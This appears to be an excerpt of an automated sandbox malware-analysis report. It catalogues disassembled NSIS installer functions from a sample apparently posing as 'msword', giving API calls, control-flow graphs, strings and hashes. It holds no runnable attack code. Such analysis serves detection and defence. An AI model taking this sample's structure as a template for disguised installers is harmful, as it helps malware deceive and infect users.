                                                                    • Opcode ID: 0b5ab136357e203ee2e090d14ec2b93cf78a9c4147554daf2c52a3a548f14690
                                                                    • Instruction ID: 271ce27004ef92612bfc9362a6cc74883a37054a4c8cca7c49d128c059fded9a
                                                                    • Opcode Fuzzy Hash: 0b5ab136357e203ee2e090d14ec2b93cf78a9c4147554daf2c52a3a548f14690
                                                                    • Instruction Fuzzy Hash: 5E71A370604B04AED721AB65EE85F2736ACEB44749F00053FF945B22E2D7B89D418F6E

                                                                    Control-flow Graph

                                                                    APIs
                                                                      • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                      • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                    • lstrcatW.KERNEL32(00000000,00000000,WarsFeltMadridFarmsPee,004CB0B0,00000000,00000000), ref: 00401A76
                                                                    • CompareFileTime.KERNEL32(-00000014,?,WarsFeltMadridFarmsPee,WarsFeltMadridFarmsPee,00000000,00000000,WarsFeltMadridFarmsPee,004CB0B0,00000000,00000000), ref: 00401AA0
                                                                      • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                      • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                      • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                      • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                      • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                                    • String ID: File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"$WarsFeltMadridFarmsPee
                                                                    • API String ID: 4286501637-4051260161
                                                                    • Opcode ID: b155778cc10115f8d02ccc56e208397f172a866a515c636f57ea647fec07d827
                                                                    • Instruction ID: fe683e2e252f9e2189d7cf48164ff2fe6631720e8c40e43e96375682ff159270
                                                                    • Opcode Fuzzy Hash: b155778cc10115f8d02ccc56e208397f172a866a515c636f57ea647fec07d827
                                                                    • Instruction Fuzzy Hash: 9D510871901114BADF10BBB1CD46EAE3A68DF05369F21413FF416B10D2EB7C5A518AAE

                                                                     Control-flow Graph (function at 00403587; legend: Executed / Not Executed; rendered graph not reproduced)
                                                                    APIs
                                                                    • GetTickCount.KERNEL32 ref: 00403598
                                                                    • GetModuleFileNameW.KERNEL32(00000000,004DF0D8,00002004,?,?,?,00000000,00403A47,?), ref: 004035B4
                                                                      • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                                      • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                                    • GetFileSize.KERNEL32(00000000,00000000,004E30E0,00000000,004CF0B8,004CF0B8,004DF0D8,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00403600
                                                                    Strings
                                                                    • Error launching installer, xrefs: 004035D7
                                                                    • Inst, xrefs: 0040366C
                                                                    • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037C5
                                                                    • soft, xrefs: 00403675
                                                                    • Null, xrefs: 0040367E
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                    • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                    • API String ID: 4283519449-527102705
                                                                    • Opcode ID: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
                                                                    • Instruction ID: 97831ba7e8e922ff386f77eab0e0d18630bd2de4bbb47cca7d976ce2c46b30f6
                                                                    • Opcode Fuzzy Hash: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
                                                                    • Instruction Fuzzy Hash: 3151D5B1900204AFDB219F65CD85B9E7EB8AB14756F10803FE605B72D1D77D9E808B9C

                                                                    Control-flow Graph

                                                                    control_flow_graph 720 40337f-403396 721 403398 720->721 722 40339f-4033a7 720->722 721->722 723 4033a9 722->723 724 4033ae-4033b3 722->724 723->724 725 4033c3-4033d0 call 403336 724->725 726 4033b5-4033be call 403368 724->726 730 4033d2 725->730 731 4033da-4033e1 725->731 726->725 732 4033d4-4033d5 730->732 733 4033e7-403407 GetTickCount call 4072f2 731->733 734 403518-40351a 731->734 735 403539-40353d 732->735 746 403536 733->746 748 40340d-403415 733->748 736 40351c-40351f 734->736 737 40357f-403583 734->737 739 403521 736->739 740 403524-40352d call 403336 736->740 741 403540-403546 737->741 742 403585 737->742 739->740 740->730 755 403533 740->755 744 403548 741->744 745 40354b-403559 call 403336 741->745 742->746 744->745 745->730 757 40355f-403572 WriteFile 745->757 746->735 751 403417 748->751 752 40341a-403428 call 403336 748->752 751->752 752->730 758 40342a-403433 752->758 755->746 759 403511-403513 757->759 760 403574-403577 757->760 761 403439-403456 call 407312 758->761 759->732 760->759 762 403579-40357c 760->762 765 40350a-40350c 761->765 766 40345c-403473 GetTickCount 761->766 762->737 765->732 767 403475-40347d 766->767 768 4034be-4034c2 766->768 769 403485-4034b6 MulDiv wsprintfW call 404f72 767->769 770 40347f-403483 767->770 771 4034c4-4034c7 768->771 772 4034ff-403502 768->772 778 4034bb 769->778 770->768 770->769 775 4034e7-4034ed 771->775 776 4034c9-4034db WriteFile 771->776 772->748 773 403508 772->773 773->746 777 4034f3-4034f7 775->777 776->759 779 4034dd-4034e0 776->779 777->761 781 4034fd 777->781 778->768 779->759 780 4034e2-4034e5 779->780 780->777 781->746
                                                                    APIs
                                                                    • GetTickCount.KERNEL32 ref: 004033E7
                                                                    • GetTickCount.KERNEL32 ref: 00403464
                                                                    • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 00403491
                                                                    • wsprintfW.USER32 ref: 004034A4
                                                                    • WriteFile.KERNELBASE(00000000,00000000,?,7FFFFFFF,00000000), ref: 004034D3
                                                                    • WriteFile.KERNEL32(00000000,0041F150,?,00000000,00000000,0041F150,?,000000FF,00000004,00000000,00000000,00000000), ref: 0040356A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1868689499.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868760543.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.000000000042B000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.000000000048F000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B3000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B7000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004BF000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1869014806.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID: CountFileTickWrite$wsprintf
                                                                    • String ID: ... %d%%$P1B$X1C$X1C
                                                                    • API String ID: 651206458-1535804072
                                                                    • Opcode ID: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
                                                                    • Instruction ID: 0313947f0097750978ec936bbe46de4fad37e772bc1cb17ec77dd8e30cfa9ece
                                                                    • Opcode Fuzzy Hash: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
                                                                    • Instruction Fuzzy Hash: 88518D71900219ABDF10DF65AE44AAF7BACAB00316F14417BF900B7290DB78DF40CBA9

                                                                    Control-flow Graph

                                                                    control_flow_graph 782 404f72-404f85 783 405042-405044 782->783 784 404f8b-404f9e 782->784 785 404fa0-404fa4 call 406805 784->785 786 404fa9-404fb5 lstrlenW 784->786 785->786 788 404fd2-404fd6 786->788 789 404fb7-404fc7 lstrlenW 786->789 792 404fe5-404fe9 788->792 793 404fd8-404fdf SetWindowTextW 788->793 790 405040-405041 789->790 791 404fc9-404fcd lstrcatW 789->791 790->783 791->788 794 404feb-40502d SendMessageW * 3 792->794 795 40502f-405031 792->795 793->792 794->795 795->790 796 405033-405038 795->796 796->790
                                                                    APIs
                                                                    • lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                    • lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                    • lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                    • SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                    • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                    • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                      • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1868689499.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868760543.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.000000000042B000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.000000000048F000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B3000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B7000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004BF000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1869014806.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                                                    • String ID:
                                                                    • API String ID: 2740478559-0
                                                                    • Opcode ID: 4a81920338a541d7bcc419c3bcbb2810a04374694b2a6e658d803f75c228445d
                                                                    • Instruction ID: 1d640e6b4f0869ec625b39ce8112f9bd6789598538fb42bade37fe3884716a8e
                                                                    • Opcode Fuzzy Hash: 4a81920338a541d7bcc419c3bcbb2810a04374694b2a6e658d803f75c228445d
                                                                    • Instruction Fuzzy Hash: 3C21B0B1900518BACF119FA5DD84E9EBFB5EF84310F10813AFA04BA291D7798E509F98

                                                                    Control-flow Graph

                                                                    control_flow_graph 797 401eb9-401ec4 798 401f24-401f26 797->798 799 401ec6-401ec9 797->799 800 401f53-401f7b GlobalAlloc call 406805 798->800 801 401f28-401f2a 798->801 802 401ed5-401ee3 call 4062a3 799->802 803 401ecb-401ecf 799->803 816 4030e3-4030f2 800->816 817 402387-40238d GlobalFree 800->817 805 401f3c-401f4e call 406009 801->805 806 401f2c-401f36 call 4062a3 801->806 814 401ee4-402702 call 406805 802->814 803->799 807 401ed1-401ed3 803->807 805->817 806->805 807->802 813 401ef7-402e50 call 406009 * 3 807->813 813->816 829 402708-40270e 814->829 817->816 829->816
                                                                    APIs
                                                                      • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                    • GlobalFree.KERNELBASE(008F3A70), ref: 00402387
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1868689499.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868760543.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.000000000042B000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.000000000048F000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B3000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B7000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004BF000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1869014806.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID: FreeGloballstrcpyn
                                                                    • String ID: Exch: stack < %d elements$Pop: stack empty$WarsFeltMadridFarmsPee
                                                                    • API String ID: 1459762280-1231270740
                                                                    • Opcode ID: 1882500a3a7973729244276bdae00bfd603f91a0f1c5eacb79451a398e12722f
                                                                    • Instruction ID: ae7cb1f2c63b60d7baa415153617f8c61fd22799b34192a347ea6a0a5f6d971a
                                                                    • Opcode Fuzzy Hash: 1882500a3a7973729244276bdae00bfd603f91a0f1c5eacb79451a398e12722f
                                                                    • Instruction Fuzzy Hash: 4721D172601105EBE710EB95DD81A6F77A8EF44318B21003FF542F32D1EB7998118AAD

                                                                    Control-flow Graph

                                                                    control_flow_graph 832 4022fd-402325 call 40145c GetFileVersionInfoSizeW 835 4030e3-4030f2 832->835 836 40232b-402339 GlobalAlloc 832->836 836->835 837 40233f-40234e GetFileVersionInfoW 836->837 839 402350-402367 VerQueryValueW 837->839 840 402384-40238d GlobalFree 837->840 839->840 843 402369-402381 call 405f51 * 2 839->843 840->835 843->840
                                                                    APIs
                                                                    • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                                                    • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                                                    • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                                                    • VerQueryValueW.VERSION(?,00408838,?,?,?,?,?,00000000), ref: 00402360
                                                                      • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                                    • GlobalFree.KERNELBASE(008F3A70), ref: 00402387
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1868689499.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868760543.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.000000000042B000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.000000000048F000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B3000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B7000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004BF000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1869014806.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                                                    • String ID:
                                                                    • API String ID: 3376005127-0
                                                                    • Opcode ID: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
                                                                    • Instruction ID: 606d2f288e59f9406d2e88b5b0598c54d729d8d595f649ff0f3e4a994beab86c
                                                                    • Opcode Fuzzy Hash: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
                                                                    • Instruction Fuzzy Hash: 82115E72900109AFCF00EFA1DD45DAE7BB8EF04344F10403AFA09F61A1D7799A40DB19

                                                                    Control-flow Graph

                                                                    control_flow_graph 848 402b23-402b37 GlobalAlloc 849 402b39-402b49 call 401446 848->849 850 402b4b-402b6a call 40145c WideCharToMultiByte lstrlenA 848->850 855 402b70-402b73 849->855 850->855 856 402b93 855->856 857 402b75-402b8d call 405f6a WriteFile 855->857 858 4030e3-4030f2 856->858 857->856 862 402384-40238d GlobalFree 857->862 862->858
                                                                    APIs
                                                                    • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                                                    • WideCharToMultiByte.KERNEL32(?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                                                    • lstrlenA.KERNEL32(?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                                                    • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1868689499.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868760543.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.000000000042B000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.000000000048F000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B3000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B7000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004BF000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1869014806.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                                                    • String ID:
                                                                    • API String ID: 2568930968-0
                                                                    • Opcode ID: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
                                                                    • Instruction ID: 5d007b3c2ae3d1ce6b2586a1921c4ad46276280cee2e515d5d1d957ff8a092fa
                                                                    • Opcode Fuzzy Hash: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
                                                                    • Instruction Fuzzy Hash: 76016171500205FBDB14AF70DE48D9E3B78EF05359F10443AF646B91E1D6798982DB68

                                                                    Control-flow Graph

                                                                    control_flow_graph 865 402713-40273b call 406009 * 2 870 402746-402749 865->870 871 40273d-402743 call 40145c 865->871 873 402755-402758 870->873 874 40274b-402752 call 40145c 870->874 871->870 875 402764-40278c call 40145c call 4062a3 WritePrivateProfileStringW 873->875 876 40275a-402761 call 40145c 873->876 874->873 876->875
                                                                    APIs
                                                                      • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                    • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1868689499.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868760543.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.000000000042B000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.000000000048F000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B3000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B7000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004BF000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1869014806.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID: PrivateProfileStringWritelstrcpyn
                                                                    • String ID: <RM>$WarsFeltMadridFarmsPee$WriteINIStr: wrote [%s] %s=%s in %s
                                                                    • API String ID: 247603264-1220653561
                                                                    • Opcode ID: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
                                                                    • Instruction ID: 1675f45263e21dacb3bd3d3c28f4c469aa899418fcec56767b4290250f933745
                                                                    • Opcode Fuzzy Hash: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
                                                                    • Instruction Fuzzy Hash: 05014F70D40319BADB10BFA18D859AF7A78AF09304F10403FF11A761E3D7B80A408BAD
                                                                    APIs
                                                                      • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                      • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                      • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                      • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                    • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004CB0B0,?), ref: 00402202
                                                                      • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                      • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                    Strings
                                                                    • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                                                    • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                                                    Similarity
                                                                    • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                                                    • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                                                    • API String ID: 3156913733-2180253247
                                                                    • Opcode ID: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
                                                                    • Instruction ID: bbc106df3db47d5a89d2587a4e22f40687ed87c50c6518a2742e337a88eb4af1
                                                                    • Opcode Fuzzy Hash: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
                                                                    • Instruction Fuzzy Hash: E001F7B2B4021476DB2077B69C87F6B2A5CDB41764B20047BF502F20E3E5BD88009139
                                                                    APIs
                                                                    • GetTickCount.KERNEL32 ref: 00405E9D
                                                                    • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,004037FE,004D30C0,004D70C8), ref: 00405EB8
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: CountFileNameTempTick
                                                                    • String ID: nsa
                                                                    • API String ID: 1716503409-2209301699
                                                                    • Opcode ID: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
                                                                    • Instruction ID: bbb7b3741c82bae03d84fc31e008e00914f4f4b6280f54d22115683b6c602e07
                                                                    • Opcode Fuzzy Hash: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
                                                                    • Instruction Fuzzy Hash: 39F0F635600604BBDB00CF55DD05A9FBBBDEF90310F00803BE944E7140E6B09E00C798
                                                                    APIs
                                                                    • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                                                      • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                      • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                    • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: Window$EnableShowlstrlenwvsprintf
                                                                    • String ID: HideWindow
                                                                    • API String ID: 1249568736-780306582
                                                                    • Opcode ID: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
                                                                    • Instruction ID: bfe0de145d0e58e27592ef60cc9cda220d4f3e6bacb950e19a0f62fa040dbd34
                                                                    • Opcode Fuzzy Hash: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
                                                                    • Instruction Fuzzy Hash: F1E09232A05111DBCB08FBB5A74A5AE76B4EA9532A721007FE143F20D0DABD8D01C62D
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1868689499.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868760543.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
